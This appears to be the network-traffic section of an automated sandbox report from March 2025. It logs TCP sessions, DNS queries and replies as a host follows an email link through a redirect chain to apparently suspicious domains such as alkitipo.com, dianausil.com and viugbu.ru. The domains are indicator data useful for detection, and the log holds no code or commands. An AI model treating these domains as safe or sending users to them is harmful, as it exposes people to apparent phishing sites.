                                                                      Mar 19, 2025 11:30:05.472783089 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.473252058 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.473285913 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.473297119 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.473304987 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.473341942 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.473354101 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.473361015 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.473391056 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.473407984 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.473412991 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.473448992 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.473455906 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.473572016 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.473592043 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.473615885 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.473617077 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.473625898 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.473663092 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.474050045 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.474095106 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.474101067 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.474109888 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.474152088 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.474164963 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.474170923 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.474222898 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.478944063 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.478992939 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.479018927 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.479038954 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.479049921 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.479087114 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.479093075 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.479125023 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.479167938 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.479556084 CET49744443192.168.2.6104.18.95.41
                                                                      Mar 19, 2025 11:30:05.479569912 CET44349744104.18.95.41192.168.2.6
                                                                      Mar 19, 2025 11:30:05.583076000 CET49745443192.168.2.6104.16.6.189
                                                                      Mar 19, 2025 11:30:05.583117008 CET44349745104.16.6.189192.168.2.6
                                                                      Mar 19, 2025 11:30:05.583174944 CET49745443192.168.2.6104.16.6.189
                                                                      Mar 19, 2025 11:30:05.583656073 CET49745443192.168.2.6104.16.6.189
                                                                      Mar 19, 2025 11:30:05.583667040 CET44349745104.16.6.189192.168.2.6
                                                                      Mar 19, 2025 11:30:05.615827084 CET44349745104.16.6.189192.168.2.6
                                                                      Mar 19, 2025 11:30:05.615894079 CET49745443192.168.2.6104.16.6.189
                                                                      Mar 19, 2025 11:30:05.617304087 CET49745443192.168.2.6104.16.6.189
                                                                      Mar 19, 2025 11:30:05.617575884 CET44349745104.16.6.189192.168.2.6
                                                                      Mar 19, 2025 11:30:05.617846966 CET49745443192.168.2.6104.16.6.189
                                                                      Mar 19, 2025 11:30:05.664321899 CET44349745104.16.6.189192.168.2.6
                                                                      Mar 19, 2025 11:30:05.769989014 CET44349745104.16.6.189192.168.2.6
                                                                      Mar 19, 2025 11:30:05.770081043 CET44349745104.16.6.189192.168.2.6
                                                                      Mar 19, 2025 11:30:05.770133972 CET49745443192.168.2.6104.16.6.189
                                                                      Mar 19, 2025 11:30:05.772219896 CET49745443192.168.2.6104.16.6.189
                                                                      Mar 19, 2025 11:30:05.772239923 CET44349745104.16.6.189192.168.2.6
                                                                      Mar 19, 2025 11:30:05.809818983 CET49746443192.168.2.6104.16.2.189
                                                                      Mar 19, 2025 11:30:05.809855938 CET44349746104.16.2.189192.168.2.6
                                                                      Mar 19, 2025 11:30:05.810062885 CET49746443192.168.2.6104.16.2.189
                                                                      Mar 19, 2025 11:30:05.810246944 CET49746443192.168.2.6104.16.2.189
                                                                      Mar 19, 2025 11:30:05.810259104 CET44349746104.16.2.189192.168.2.6
                                                                      Mar 19, 2025 11:30:05.834860086 CET44349746104.16.2.189192.168.2.6
                                                                      Mar 19, 2025 11:30:05.834949970 CET49746443192.168.2.6104.16.2.189
                                                                      Mar 19, 2025 11:30:05.835510969 CET49746443192.168.2.6104.16.2.189
                                                                      Mar 19, 2025 11:30:05.835731983 CET44349746104.16.2.189192.168.2.6
                                                                      Mar 19, 2025 11:30:05.836210012 CET49746443192.168.2.6104.16.2.189
                                                                      Mar 19, 2025 11:30:05.876322985 CET44349746104.16.2.189192.168.2.6
                                                                      Mar 19, 2025 11:30:06.010600090 CET44349746104.16.2.189192.168.2.6
                                                                      Mar 19, 2025 11:30:06.010718107 CET44349746104.16.2.189192.168.2.6
                                                                      Mar 19, 2025 11:30:06.010823011 CET49746443192.168.2.6104.16.2.189
                                                                      Mar 19, 2025 11:30:06.012943029 CET49746443192.168.2.6104.16.2.189
                                                                      Mar 19, 2025 11:30:06.012959957 CET44349746104.16.2.189192.168.2.6
                                                                      Mar 19, 2025 11:30:15.582779884 CET49747443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:15.582833052 CET44349747172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:15.582927942 CET49747443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:15.583620071 CET49747443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:15.583633900 CET44349747172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:15.618436098 CET44349747172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:15.618510008 CET49747443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:15.619741917 CET49747443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:15.619968891 CET44349747172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:15.620290995 CET49747443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:15.660324097 CET44349747172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:16.351089001 CET44349747172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:16.351197958 CET44349747172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:16.351293087 CET49747443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:16.374075890 CET5574153192.168.2.6162.159.36.2
                                                                      Mar 19, 2025 11:30:16.379482031 CET5355741162.159.36.2192.168.2.6
                                                                      Mar 19, 2025 11:30:16.379589081 CET5574153192.168.2.6162.159.36.2
                                                                      Mar 19, 2025 11:30:16.386682987 CET5355741162.159.36.2192.168.2.6
                                                                      Mar 19, 2025 11:30:16.388164997 CET49747443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:16.388201952 CET44349747172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:16.437376976 CET5574153192.168.2.6162.159.36.2
                                                                      Mar 19, 2025 11:30:16.459042072 CET5574153192.168.2.6162.159.36.2
                                                                      Mar 19, 2025 11:30:16.464200020 CET5355741162.159.36.2192.168.2.6
                                                                      Mar 19, 2025 11:30:16.464268923 CET5574153192.168.2.6162.159.36.2
                                                                      Mar 19, 2025 11:30:16.528754950 CET55744443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:16.528806925 CET44355744172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:16.528876066 CET55744443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:16.529133081 CET55744443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:16.529144049 CET44355744172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:16.556082010 CET44355744172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:16.556154013 CET55744443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:16.556812048 CET55744443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:16.557063103 CET44355744172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:16.557404995 CET55744443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:16.604321003 CET44355744172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:17.374823093 CET44355744172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:17.374937057 CET44355744172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:17.374996901 CET55744443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:17.376105070 CET55744443192.168.2.6172.67.148.100
                                                                      Mar 19, 2025 11:30:17.376122952 CET44355744172.67.148.100192.168.2.6
                                                                      Mar 19, 2025 11:30:19.060828924 CET44349739104.21.5.130192.168.2.6
                                                                      Mar 19, 2025 11:30:19.060889959 CET44349739104.21.5.130192.168.2.6
                                                                      Mar 19, 2025 11:30:19.061120033 CET49739443192.168.2.6104.21.5.130
                                                                      Mar 19, 2025 11:30:20.341649055 CET49739443192.168.2.6104.21.5.130
                                                                      Mar 19, 2025 11:30:20.341689110 CET44349739104.21.5.130192.168.2.6
                                                                      Mar 19, 2025 11:30:26.601680040 CET55750443192.168.2.6104.21.23.248
                                                                      Mar 19, 2025 11:30:26.601732016 CET44355750104.21.23.248192.168.2.6
                                                                      Mar 19, 2025 11:30:26.601912975 CET55750443192.168.2.6104.21.23.248
                                                                      Mar 19, 2025 11:30:26.602221012 CET55750443192.168.2.6104.21.23.248
                                                                      Mar 19, 2025 11:30:26.602247000 CET44355750104.21.23.248192.168.2.6
                                                                      Mar 19, 2025 11:30:26.628863096 CET44355750104.21.23.248192.168.2.6
                                                                      Mar 19, 2025 11:30:26.629112005 CET55750443192.168.2.6104.21.23.248
                                                                      Mar 19, 2025 11:30:26.672322989 CET44355750104.21.23.248192.168.2.6
                                                                      Mar 19, 2025 11:30:29.933629990 CET4968580192.168.2.6142.250.186.99
                                                                      Mar 19, 2025 11:30:29.938688993 CET8049685142.250.186.99192.168.2.6
                                                                      Mar 19, 2025 11:30:29.938822985 CET4968580192.168.2.6142.250.186.99
                                                                      Mar 19, 2025 11:30:32.202651024 CET49687443192.168.2.695.101.79.131
                                                                      Mar 19, 2025 11:30:32.203031063 CET4968980192.168.2.62.23.77.188
                                                                      Mar 19, 2025 11:30:38.832035065 CET4970580192.168.2.634.102.239.211
                                                                      Mar 19, 2025 11:30:38.839205980 CET804970534.102.239.211192.168.2.6
                                                                      Mar 19, 2025 11:30:38.847090960 CET4970680192.168.2.634.102.239.211
                                                                      Mar 19, 2025 11:30:38.854383945 CET804970634.102.239.211192.168.2.6
                                                                      Mar 19, 2025 11:30:41.624861956 CET44355750104.21.23.248192.168.2.6
                                                                      Mar 19, 2025 11:30:41.624938011 CET44355750104.21.23.248192.168.2.6
                                                                      Mar 19, 2025 11:30:41.624996901 CET55750443192.168.2.6104.21.23.248
                                                                      Mar 19, 2025 11:30:42.350101948 CET55750443192.168.2.6104.21.23.248
                                                                      Mar 19, 2025 11:30:42.350138903 CET44355750104.21.23.248192.168.2.6
                                                                      Mar 19, 2025 11:30:52.249099016 CET55755443192.168.2.6142.250.184.228
                                                                      Mar 19, 2025 11:30:52.249152899 CET44355755142.250.184.228192.168.2.6
                                                                      Mar 19, 2025 11:30:52.249227047 CET55755443192.168.2.6142.250.184.228
                                                                      Mar 19, 2025 11:30:52.249427080 CET55755443192.168.2.6142.250.184.228
                                                                      Mar 19, 2025 11:30:52.249438047 CET44355755142.250.184.228192.168.2.6
                                                                      Mar 19, 2025 11:30:52.279531002 CET44355755142.250.184.228192.168.2.6
                                                                      Mar 19, 2025 11:30:52.282147884 CET55755443192.168.2.6142.250.184.228
                                                                      Mar 19, 2025 11:30:52.328329086 CET44355755142.250.184.228192.168.2.6
                                                                      Mar 19, 2025 11:30:54.334466934 CET4970680192.168.2.634.102.239.211
                                                                      Mar 19, 2025 11:30:54.334546089 CET4970580192.168.2.634.102.239.211
                                                                      Mar 19, 2025 11:30:54.353972912 CET804970634.102.239.211192.168.2.6
                                                                      Mar 19, 2025 11:30:54.353995085 CET804970534.102.239.211192.168.2.6
                                                                      Mar 19, 2025 11:30:54.354096889 CET4970680192.168.2.634.102.239.211
                                                                      Mar 19, 2025 11:30:54.354110956 CET4970580192.168.2.634.102.239.211
                                                                      Mar 19, 2025 11:31:02.280570030 CET44355755142.250.184.228192.168.2.6
                                                                      Mar 19, 2025 11:31:02.280632019 CET44355755142.250.184.228192.168.2.6
                                                                      Mar 19, 2025 11:31:02.280695915 CET55755443192.168.2.6142.250.184.228
                                                                      Mar 19, 2025 11:31:02.337455988 CET55755443192.168.2.6142.250.184.228
                                                                      Mar 19, 2025 11:31:02.337500095 CET44355755142.250.184.228192.168.2.6
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Mar 19, 2025 11:29:48.070250988 CET53537511.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:48.224658012 CET53550921.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:48.431581020 CET53566211.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:52.185503006 CET5589353192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:52.185691118 CET5633353192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:52.192395926 CET53558931.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:52.192687035 CET53563331.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:53.727415085 CET4969553192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:53.727823019 CET6445453192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:53.751374960 CET5568453192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:53.751547098 CET6452753192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:53.786323071 CET53644541.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:53.790724993 CET53645271.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:53.820961952 CET53496951.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:53.823093891 CET53556841.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:54.182389021 CET5164253192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:54.182554007 CET6304953192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:54.198542118 CET53630491.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:54.210400105 CET53516421.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:54.357943058 CET6445653192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:54.358145952 CET6548953192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:54.366117954 CET53654891.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:54.366854906 CET53644561.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:54.729890108 CET5061853192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:54.730201006 CET6491753192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:54.738102913 CET53649171.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:54.738781929 CET53506181.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:55.401725054 CET6443753192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:55.402025938 CET6280953192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:55.414633036 CET53644371.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:55.443334103 CET53628091.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:55.502867937 CET4947553192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:55.503135920 CET5027653192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:55.510092020 CET53494751.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:55.511392117 CET53502761.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:55.561645985 CET6426253192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:55.562913895 CET5347053192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:29:55.570271015 CET53642621.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:29:55.570765018 CET53534701.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:04.158255100 CET5104753192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:04.159246922 CET6348653192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:04.174498081 CET53510471.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:04.180203915 CET53634861.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:05.235640049 CET5922653192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:05.236042023 CET5884753192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:05.240056038 CET6511753192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:05.240326881 CET6530653192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:05.240720034 CET5175053192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:05.241164923 CET5665453192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:05.242183924 CET53592261.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:05.242841005 CET53588471.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:05.248233080 CET53651171.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:05.248373032 CET53517501.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:05.249027967 CET53566541.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:05.250441074 CET53653061.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:05.522922039 CET53513231.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:05.571006060 CET5979653192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:05.571208000 CET6137453192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:05.578696012 CET53597961.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:05.582144022 CET53613741.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:05.782188892 CET6493053192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:05.782361984 CET6210553192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:05.789786100 CET53649301.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:05.834009886 CET53621051.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:15.530026913 CET5432653192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:15.530183077 CET5960953192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:15.580379009 CET53543261.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:15.581990957 CET53596091.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:16.224617004 CET5360255162.159.36.2192.168.2.6
                                                                      Mar 19, 2025 11:30:16.400594950 CET5858253192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:16.400762081 CET5846253192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:16.406524897 CET53565941.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:16.407135010 CET53584621.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:16.408536911 CET53585821.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:16.409221888 CET6376553192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:16.417221069 CET53637651.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:16.425679922 CET5834353192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:16.426001072 CET5114953192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:16.441476107 CET53511491.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:16.469587088 CET5130353192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:16.477472067 CET53513031.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:16.524507999 CET53583431.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:16.604511976 CET5271753192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:16.604804993 CET5495353192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:16.611005068 CET53527171.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:16.612037897 CET53549531.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:26.566068888 CET6105953192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:26.598298073 CET53610591.1.1.1192.168.2.6
                                                                      Mar 19, 2025 11:30:40.655550957 CET138138192.168.2.6192.168.2.255
                                                                      Mar 19, 2025 11:30:52.239116907 CET6400753192.168.2.61.1.1.1
                                                                      Mar 19, 2025 11:30:52.247137070 CET53640071.1.1.1192.168.2.6
                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                      Mar 19, 2025 11:29:55.443420887 CET192.168.2.61.1.1.1c292(Port unreachable)Destination Unreachable
                                                                      Mar 19, 2025 11:30:05.834094048 CET192.168.2.61.1.1.1c276(Port unreachable)Destination Unreachable
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Mar 19, 2025 11:29:52.185503006 CET192.168.2.61.1.1.10x9cadStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:52.185691118 CET192.168.2.61.1.1.10x3434Standard query (0)www.google.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:53.727415085 CET192.168.2.61.1.1.10x3de1Standard query (0)email.mg.dior.com.sgA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:53.727823019 CET192.168.2.61.1.1.10x5fecStandard query (0)email.mg.dior.com.sg65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:53.751374960 CET192.168.2.61.1.1.10xdb6Standard query (0)email.mg.dior.com.sgA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:53.751547098 CET192.168.2.61.1.1.10x8a3eStandard query (0)email.mg.dior.com.sg65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.182389021 CET192.168.2.61.1.1.10xe60cStandard query (0)a6b7c1be5ea686d6c0c05e957.alkitipo.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.182554007 CET192.168.2.61.1.1.10xb082Standard query (0)a6b7c1be5ea686d6c0c05e957.alkitipo.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.357943058 CET192.168.2.61.1.1.10x5e05Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.358145952 CET192.168.2.61.1.1.10x14ecStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.729890108 CET192.168.2.61.1.1.10x4406Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:54.730201006 CET192.168.2.61.1.1.10x5c3cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.401725054 CET192.168.2.61.1.1.10x80d8Standard query (0)a6b7c1be5ea686d6c0c05e957.alkitipo.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.402025938 CET192.168.2.61.1.1.10x36f6Standard query (0)a6b7c1be5ea686d6c0c05e957.alkitipo.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.502867937 CET192.168.2.61.1.1.10x4e94Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.503135920 CET192.168.2.61.1.1.10x9c01Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.561645985 CET192.168.2.61.1.1.10xbad8Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:55.562913895 CET192.168.2.61.1.1.10xc84cStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:04.158255100 CET192.168.2.61.1.1.10x9dcbStandard query (0)yg.dianausil.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:04.159246922 CET192.168.2.61.1.1.10xebceStandard query (0)yg.dianausil.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.235640049 CET192.168.2.61.1.1.10xa953Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.236042023 CET192.168.2.61.1.1.10x33dcStandard query (0)code.jquery.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.240056038 CET192.168.2.61.1.1.10xea94Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.240326881 CET192.168.2.61.1.1.10x7166Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.240720034 CET192.168.2.61.1.1.10xcc7eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.241164923 CET192.168.2.61.1.1.10x1c7eStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.571006060 CET192.168.2.61.1.1.10xdde4Standard query (0)developers.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.571208000 CET192.168.2.61.1.1.10x24ffStandard query (0)developers.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.782188892 CET192.168.2.61.1.1.10x393eStandard query (0)developers.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:05.782361984 CET192.168.2.61.1.1.10x610aStandard query (0)developers.cloudflare.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:15.530026913 CET192.168.2.61.1.1.10x4397Standard query (0)luux.viugbu.ruA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:15.530183077 CET192.168.2.61.1.1.10x2feStandard query (0)luux.viugbu.ru65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.400594950 CET192.168.2.61.1.1.10xb709Standard query (0)via.placeholder.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.400762081 CET192.168.2.61.1.1.10x7ba9Standard query (0)via.placeholder.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.409221888 CET192.168.2.61.1.1.10xd3d3Standard query (0)via.placeholder.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.425679922 CET192.168.2.61.1.1.10xbbe7Standard query (0)luux.viugbu.ruA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.426001072 CET192.168.2.61.1.1.10x6d7eStandard query (0)luux.viugbu.ru65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.469587088 CET192.168.2.61.1.1.10x2c62Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.604511976 CET192.168.2.61.1.1.10x3df9Standard query (0)via.placeholder.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:16.604804993 CET192.168.2.61.1.1.10xa32cStandard query (0)via.placeholder.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:30:26.566068888 CET192.168.2.61.1.1.10x496Standard query (0)yg.dianausil.comA (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:30:52.239116907 CET192.168.2.61.1.1.10xaa2cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Mar 19, 2025 11:29:52.192395926 CET1.1.1.1192.168.2.60x9cadNo error (0)www.google.com172.217.16.132A (IP address)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:52.192687035 CET1.1.1.1192.168.2.60x3434No error (0)www.google.com65IN (0x0001)false
                                                                      Mar 19, 2025 11:29:53.786323071 CET1.1.1.1192.168.2.60x5fecNo error (0)email.mg.dior.com.sgmailgun.orgCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:53.790724993 CET1.1.1.1192.168.2.60x8a3eNo error (0)email.mg.dior.com.sgmailgun.orgCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:53.820961952 CET1.1.1.1192.168.2.60x3de1No error (0)email.mg.dior.com.sgmailgun.orgCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 19, 2025 11:29:53.820961952 CET1.1.1.1192.168.2.60x3de1No error (0)mailgun.org34.102.239.211A (IP address)IN (0x0001)false
